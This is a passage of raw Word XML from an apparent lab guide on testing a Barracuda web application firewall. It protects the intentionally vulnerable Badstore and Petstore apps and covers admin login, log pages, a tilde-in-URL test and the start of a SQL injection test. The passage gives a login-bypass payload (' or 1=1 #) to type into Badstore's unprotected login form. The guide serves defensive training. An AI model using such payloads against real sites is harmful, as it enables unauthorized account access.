          <w:p w14:paraId="7EC3ED61" w14:textId="3857557D" w:rsidR="0089134D" w:rsidRPr="00286DC0" w:rsidRDefault="0089134D"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rsidRPr="00286DC0">
              <w:t>http://&lt;PublicIPAddress&gt;:8080</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4135" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D76ABCF" w14:textId="111CB795" w:rsidR="0089134D" w:rsidRPr="00286DC0" w:rsidRDefault="006A5D68"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286DC0">
              <w:t>Petstore</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00286DC0">
              <w:t xml:space="preserve"> app, protected by WAF</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0089134D" w:rsidRPr="00286DC0" w14:paraId="64B38D26" w14:textId="77777777" w:rsidTr="006A5D68">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1435" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EA7A3F3" w14:textId="31ED2C97" w:rsidR="0089134D" w:rsidRPr="00286DC0" w:rsidRDefault="0089134D" w:rsidP="006A5D68">
            <w:pPr>
              <w:pStyle w:val="ListNumber"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00286DC0">
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3780" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D9838ED" w14:textId="4753A32C" w:rsidR="0089134D" w:rsidRPr="00286DC0" w:rsidRDefault="0089134D" w:rsidP="002A7B0C">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rsidRPr="00286DC0">
              <w:t>http://&lt;WebServerIPAddress&gt;:8000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4135" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03CCD928" w14:textId="026F20AA" w:rsidR="0089134D" w:rsidRPr="00286DC0" w:rsidRDefault="00C3368C" w:rsidP="002A7B0C">
            <w:pPr>
              <w:pStyle w:val="ListNumber"/>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t>Badstore</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="006A5D68" w:rsidRPr="00286DC0">
              <w:t xml:space="preserve"> app, unprotected</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0089134D" w:rsidRPr="00286DC0" w14:paraId="7C401F43" w14:textId="77777777" w:rsidTr="006A5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A7FEBA" w14:textId="72D47412" w:rsidR="0089134D" w:rsidRPr="00286DC0" w:rsidRDefault="0089134D" w:rsidP="006A5D68">
            <w:pPr>
              <w:pStyle w:val="ListNumber"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00286DC0">
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3780" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="573ADECB" w14:textId="3049A0BB" w:rsidR="0089134D" w:rsidRPr="00286DC0" w:rsidRDefault="0089134D"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rsidRPr="00286DC0">
              <w:t>http://&lt;WebServerIPAddress&gt;:8080</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4135" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0881F27B" w14:textId="3752EA9E" w:rsidR="0089134D" w:rsidRPr="00286DC0" w:rsidRDefault="006A5D68" w:rsidP="002A7B0C">
            <w:pPr>
              <w:pStyle w:val="ListNumber"/>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286DC0">
              <w:t>Petstore</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00286DC0">
              <w:t xml:space="preserve"> app, unprotected</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2AD3661A" w14:textId="1BD5A3B6" w:rsidR="002A7B0C" w:rsidRPr="00286DC0" w:rsidRDefault="002A7B0C" w:rsidP="002A7B0C">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2337628F" w14:textId="77777777" w:rsidR="006A5D68" w:rsidRPr="00286DC0" w:rsidRDefault="006A5D68" w:rsidP="003650CA"/>
    <w:p w14:paraId="68930048" w14:textId="77777777" w:rsidR="006A5D68" w:rsidRPr="00286DC0" w:rsidRDefault="006A5D68" w:rsidP="003650CA">
      <w:r w:rsidRPr="00286DC0">
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00286DC0">
        <w:t>FireFox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00286DC0">
        <w:t xml:space="preserve"> the tabs look like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF51F4B" w14:textId="27DCEA6F" w:rsidR="006A5D68" w:rsidRPr="00286DC0" w:rsidRDefault="00AD5010" w:rsidP="003650CA">
      <w:r w:rsidRPr="00AD5010">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="611A679C" wp14:editId="01DBCEED">
            <wp:extent cx="5943600" cy="3562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6235"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD9A3D5" w14:textId="7B91C114" w:rsidR="006A5D68" w:rsidRPr="00286DC0" w:rsidRDefault="006A5D68" w:rsidP="003650CA"/>
    <w:p w14:paraId="21A925B0" w14:textId="49A74E72" w:rsidR="006A5D68" w:rsidRPr="00286DC0" w:rsidRDefault="006A5D68" w:rsidP="003650CA">
      <w:r w:rsidRPr="00286DC0">
        <w:t>Notice that the two tabs representing our protect apps are showing a problem loading the page. This is normal because we have not yet configured the WAF. In the next section we will configure the WAF and refresh those two browser tabs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327955E3" w14:textId="73E0C392" w:rsidR="006A5D68" w:rsidRPr="00286DC0" w:rsidRDefault="006A5D68" w:rsidP="003650CA"/>
    <w:p w14:paraId="10BBBDA4" w14:textId="77777777" w:rsidR="006A5D68" w:rsidRPr="00286DC0" w:rsidRDefault="006A5D68" w:rsidP="003650CA"/>
    <w:p w14:paraId="0057C45B" w14:textId="07A74C86" w:rsidR="006A5D68" w:rsidRPr="00286DC0" w:rsidRDefault="000C6CEB" w:rsidP="006A5D68">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc76995339"/>
      <w:r>
        <w:t>Login to</w:t>
      </w:r>
      <w:r w:rsidR="006A5D68" w:rsidRPr="00286DC0">
        <w:t xml:space="preserve"> the WAF</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:t xml:space="preserve"> Admin Interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F39898" w14:textId="3E6D14B6" w:rsidR="00FE2272" w:rsidRDefault="00FE2272" w:rsidP="003650CA"/>
    <w:p w14:paraId="707F08FA" w14:textId="366F575E" w:rsidR="003650CA" w:rsidRPr="00286DC0" w:rsidRDefault="006A5D68" w:rsidP="003650CA">
      <w:r w:rsidRPr="00286DC0">
        <w:t xml:space="preserve">The WAF admin UI is laid out in </w:t>
      </w:r>
      <w:r w:rsidR="0064046F" w:rsidRPr="00286DC0">
        <w:t>tabs and pages. Start by logging in to the WAF. The username is “admin</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0064046F" w:rsidRPr="00286DC0">
        <w:t>”</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0064046F" w:rsidRPr="00286DC0">
        <w:t xml:space="preserve"> and the password is the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0064046F" w:rsidRPr="00286DC0">
        <w:t>WAFInstanceID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0064046F" w:rsidRPr="00286DC0">
        <w:t xml:space="preserve"> value. The login looks </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0064046F" w:rsidRPr="00286DC0">
        <w:t>similar to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0064046F" w:rsidRPr="00286DC0">
        <w:t xml:space="preserve"> this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FA0AD5" w14:textId="5B7E7A40" w:rsidR="0064046F" w:rsidRPr="00286DC0" w:rsidRDefault="0064046F" w:rsidP="003650CA"/>
    <w:p w14:paraId="1E24C02B" w14:textId="0C857942" w:rsidR="0064046F" w:rsidRPr="00286DC0" w:rsidRDefault="0064046F" w:rsidP="003650CA">
      <w:r w:rsidRPr="00286DC0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="684A54B7" wp14:editId="1EB478A8">
            <wp:extent cx="2926080" cy="1956021"/>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4174" cy="1961432"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7169E178" w14:textId="6EE69A70" w:rsidR="001118A3" w:rsidRDefault="001118A3" w:rsidP="001118A3"/>
    <w:p w14:paraId="1FBFA876" w14:textId="4E24ED1C" w:rsidR="00B16A5F" w:rsidRDefault="00B16A5F" w:rsidP="001118A3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">At login you will see the Dashboard page. </w:t>
      </w:r>
      <w:r w:rsidR="004A02ED">
        <w:t xml:space="preserve">Feel free to navigate around the interface. For the tests you will be most interested in going to </w:t>
      </w:r>
      <w:r w:rsidR="004A02ED" w:rsidRPr="00440964">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>BASIC &gt; Web Firewall Logs</w:t>
      </w:r>
      <w:r w:rsidR="004A02ED">
        <w:t xml:space="preserve">. The logs on this page contain all the </w:t>
      </w:r>
      <w:r w:rsidR="00BD67FF">
        <w:t xml:space="preserve">requests upon which the WAF took </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00BD67FF">
        <w:t>some kind of action</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00BD67FF">
        <w:t xml:space="preserve">- Block, Cloak, etc. </w:t>
      </w:r>
      <w:r w:rsidR="00660900">
        <w:t xml:space="preserve">Each record will have details about the attack that was detected and blocked. </w:t>
      </w:r>
      <w:r w:rsidR="007F30D6">
        <w:t xml:space="preserve">The other commonly view logs page is </w:t>
      </w:r>
      <w:r w:rsidR="007F30D6" w:rsidRPr="00487FCA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>BASIC &gt; Access Logs</w:t>
      </w:r>
      <w:r w:rsidR="007F30D6">
        <w:t xml:space="preserve">. Access logs </w:t>
      </w:r>
      <w:r w:rsidR="00CB45D8">
        <w:t>contain a record of every web request processed by the WAF</w:t>
      </w:r>
      <w:r w:rsidR="00487FCA">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3756742D" w14:textId="2D328CC7" w:rsidR="00CA7203" w:rsidRPr="00286DC0" w:rsidRDefault="00CA7203" w:rsidP="00CA7203">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc76995343"/>
      <w:r w:rsidRPr="00286DC0">
        <w:t>Test Access to Web Applications</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="1E4F09F0" w14:textId="77777777" w:rsidR="00CA7203" w:rsidRPr="00286DC0" w:rsidRDefault="00CA7203" w:rsidP="00CA7203"/>
    <w:p w14:paraId="074F7ACC" w14:textId="0BE753AA" w:rsidR="00CA7203" w:rsidRDefault="009E60D3" w:rsidP="00CA7203">
      <w:r>
        <w:t xml:space="preserve">Refresh browser tab #2 and browser tab #3. </w:t>
      </w:r>
      <w:r w:rsidR="001118A3">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006E7E1C">
        <w:t>Badstore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001118A3">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="004151BE">
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="001118A3">
        <w:t xml:space="preserve">et </w:t>
      </w:r>
      <w:r w:rsidR="004151BE">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="001118A3">
        <w:t>tore websites should now be displayed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BC46CD" w14:textId="5B3E0D8C" w:rsidR="001118A3" w:rsidRDefault="001118A3" w:rsidP="00CA7203">
      <w:r>
        <w:t xml:space="preserve">In browser tab #1, navigate to </w:t>
      </w:r>
      <w:r w:rsidRPr="003B00D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>BASIC &gt; Access Logs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. You should see </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>a number of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> log entries. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Typically</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> you will see a number of green “200 OK” entries and a few red “404 – Not Found” entries. This is normal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769A91F7" w14:textId="0F3BCD98" w:rsidR="001118A3" w:rsidRDefault="001118A3" w:rsidP="00CA7203"/>
    <w:p w14:paraId="044AEEE7" w14:textId="534814BF" w:rsidR="001118A3" w:rsidRPr="00286DC0" w:rsidRDefault="001118A3" w:rsidP="00CA7203">
      <w:r>
        <w:t xml:space="preserve">Navigate to </w:t>
      </w:r>
      <w:r w:rsidRPr="003B00D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>BASIC &gt; Web Firewall Logs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. This page contains the log entries for any traffic that was blocked or cloaked. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Typically</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> you will see some gray “CLOAKED” entries and possibly a few red “DENIED” entries. This is normal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D295E9" w14:textId="77777777" w:rsidR="00CA7203" w:rsidRPr="00286DC0" w:rsidRDefault="00CA7203" w:rsidP="00CA7203"/>
    <w:p w14:paraId="70CA1DCD" w14:textId="593CF069" w:rsidR="0064046F" w:rsidRPr="00286DC0" w:rsidRDefault="0064046F" w:rsidP="003650CA"/>
    <w:p w14:paraId="11DFDD24" w14:textId="20579969" w:rsidR="00CA7203" w:rsidRPr="00286DC0" w:rsidRDefault="00CA7203" w:rsidP="00CA7203">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc76995344"/>
      <w:r w:rsidRPr="00286DC0">
        <w:t>Basic Application Security Tests</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="2CC563C6" w14:textId="77777777" w:rsidR="00CA7203" w:rsidRPr="00286DC0" w:rsidRDefault="00CA7203" w:rsidP="003650CA"/>
    <w:p w14:paraId="5BA50BD9" w14:textId="7FBA6519" w:rsidR="00CA7203" w:rsidRPr="00286DC0" w:rsidRDefault="00CA7203" w:rsidP="003650CA">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00286DC0">
        <w:t>Let’s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00286DC0">
        <w:t xml:space="preserve"> perform some simple web application “attacks” against our vulnerable applications. We will attack our unprotected application first, observing its behavior. We will attempt the same attack through the WAF and observe how the application is protected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DCEECD" w14:textId="01C2095D" w:rsidR="00CA7203" w:rsidRPr="00286DC0" w:rsidRDefault="00CA7203" w:rsidP="003650CA"/>
    <w:p w14:paraId="0BEDF4ED" w14:textId="4117FA7E" w:rsidR="00CA7203" w:rsidRPr="00286DC0" w:rsidRDefault="00CA7203" w:rsidP="003B333A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc76995345"/>
      <w:r w:rsidRPr="00286DC0">
        <w:t>Test 1: Tilde in URL Path</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="4FF19C99" w14:textId="52B187FA" w:rsidR="00CA7203" w:rsidRPr="00286DC0" w:rsidRDefault="00CA7203" w:rsidP="003650CA"/>
    <w:p w14:paraId="5278A4BF" w14:textId="77777777" w:rsidR="00437706" w:rsidRDefault="00CA7203" w:rsidP="00392965">
      <w:r w:rsidRPr="00286DC0">
        <w:t xml:space="preserve">This is a very simple test to verify that our WAF is indeed in active blocking mode and therefore protecting our </w:t>
      </w:r>
      <w:r w:rsidR="003B333A" w:rsidRPr="00286DC0">
        <w:t>applications</w:t>
      </w:r>
      <w:r w:rsidR="00437706">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BD5F25" w14:textId="2B906304" w:rsidR="00437706" w:rsidRDefault="00437706" w:rsidP="00437706">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>On browser tab #4 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004720AB">
        <w:t>Badstore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, unprotected) click in the navigation bar and clear out all text to the right of “:8000/” and replace with a tilde. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788AB57B" w14:textId="68F7E9ED" w:rsidR="003650CA" w:rsidRDefault="00437706" w:rsidP="00437706">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The address will be similar to: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>http://1.2.3.4:8000/~</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="09D620FD" w14:textId="3CFB1BDC" w:rsidR="00437706" w:rsidRDefault="00437706" w:rsidP="00437706">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Press &lt;enter&gt; and observe the results. </w:t>
      </w:r>
      <w:r w:rsidR="00871A89">
        <w:t xml:space="preserve">In our case there is a not found error. </w:t>
      </w:r>
      <w:r w:rsidR="00611E23">
        <w:t>While 404 not found is common, in this case our web server is leaking information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456F1016" w14:textId="77777777" w:rsidR="007D6BC6" w:rsidRDefault="007D6BC6" w:rsidP="007D6BC6"/>
    <w:p w14:paraId="3BF0BD5D" w14:textId="4969749D" w:rsidR="004B6BC2" w:rsidRDefault="004B6BC2" w:rsidP="007D6BC6">
      <w:r>
        <w:t xml:space="preserve">Perform the same test </w:t>
      </w:r>
      <w:r w:rsidR="00141E46">
        <w:t>using the Barracuda WAF:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446FEA3F" w14:textId="3154889A" w:rsidR="007A33A7" w:rsidRDefault="007A33A7" w:rsidP="00437706">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>On browser tab #2 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004720AB">
        <w:t>Badstore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, protected) click in the navigation bar and perform the same test. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6600444C" w14:textId="050E2D5E" w:rsidR="007A33A7" w:rsidRDefault="007A33A7" w:rsidP="00437706">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The address will be similar to: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>http://5.6.7.8/~</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEF2C98" w14:textId="6E1423CA" w:rsidR="007A33A7" w:rsidRDefault="007A33A7" w:rsidP="00437706">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The WAF will block the request with a generic “not found” response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15ADFC10" w14:textId="06BCEA7C" w:rsidR="007A33A7" w:rsidRDefault="007A33A7" w:rsidP="007A33A7">
      <w:r w:rsidRPr="007A33A7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="187C5DC8" wp14:editId="3E1E6AAE">
            <wp:extent cx="3648974" cy="331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9710" cy="339065"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5100BADC" w14:textId="2FEF6CE1" w:rsidR="00437706" w:rsidRDefault="00437706" w:rsidP="00437706"/>
    <w:p w14:paraId="0F30BB26" w14:textId="60225FC8" w:rsidR="007A33A7" w:rsidRPr="00286DC0" w:rsidRDefault="007A33A7" w:rsidP="00437706">
      <w:r>
        <w:t xml:space="preserve">This test verifies that the WAF is in blocking mode and protecting the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004720AB">
        <w:t>Badstore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> app.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEF59F0" w14:textId="6603ED02" w:rsidR="00CA7203" w:rsidRDefault="00CA7203" w:rsidP="00392965"/>
    <w:p w14:paraId="3FA855D2" w14:textId="61E55DA3" w:rsidR="0091088A" w:rsidRDefault="0091088A" w:rsidP="00392965">
      <w:r>
        <w:t xml:space="preserve">In each browser tab, click in the navigation bar, delete the tilde, and press &lt;enter&gt; to return to the main page of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004720AB">
        <w:t>Badstore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> app.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B20BEE8" w14:textId="0248924B" w:rsidR="00724ADD" w:rsidRDefault="00724ADD" w:rsidP="00392965"/>
    <w:p w14:paraId="7BA6167C" w14:textId="5FEA7A48" w:rsidR="00B2367D" w:rsidRDefault="00B2367D" w:rsidP="00B2367D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc76995346"/>
      <w:r>
        <w:t xml:space="preserve">Test 2: </w:t>
      </w:r>
      <w:r w:rsidR="001165FF">
        <w:t>SQL Injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="2DB992BA" w14:textId="77777777" w:rsidR="00B2367D" w:rsidRDefault="00B2367D" w:rsidP="00B2367D"/>
    <w:p w14:paraId="433EB0D4" w14:textId="1C26C115" w:rsidR="00B2367D" w:rsidRDefault="00B2367D" w:rsidP="00B2367D">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Let’s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> test for the presence of a</w:t>
      </w:r>
      <w:r w:rsidR="001165FF">
        <w:t xml:space="preserve"> SQL injection (SQLi) vulnerability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="001165FF">
        <w:t xml:space="preserve">SQL injections allow attackers to gain access to </w:t>
      </w:r>
      <w:r w:rsidR="003A2867">
        <w:t xml:space="preserve">private information or log in as registered users without </w:t>
      </w:r>
      <w:r w:rsidR="008E7AA5">
        <w:t>credentials</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571284E3" w14:textId="0E7E9CB4" w:rsidR="00B2367D" w:rsidRDefault="00255F07" w:rsidP="00B2367D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>On browser tab #4 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Badstore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, unprotected) note that </w:t>
      </w:r>
      <w:r w:rsidR="00AF153E">
        <w:t xml:space="preserve">you are </w:t>
      </w:r>
      <w:r w:rsidR="00D91B3F">
        <w:t>an Un</w:t>
      </w:r>
      <w:r w:rsidR="005563F0">
        <w:t>registered User:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19134113" w14:textId="530AD15D" w:rsidR="005563F0" w:rsidRDefault="0001545C" w:rsidP="0001545C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="768"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="610EAD8E" wp14:editId="0B251973">
            <wp:extent cx="1924050" cy="4471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1924050" cy="447138"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C6BCE3" w14:textId="77777777" w:rsidR="00C47C98" w:rsidRDefault="00C47C98" w:rsidP="0001545C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="768"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C80EA6D" w14:textId="55BE13D4" w:rsidR="00B2367D" w:rsidRPr="0062648F" w:rsidRDefault="00F40401" w:rsidP="00227BBB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00062807">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Click Login / Register and enter ' or 1=1 # for the email address, then click Login</w:t>
      </w:r>
      <w:r w:rsidRPr="00227BBB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="SimSun" w:hAnsi="Calibri" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
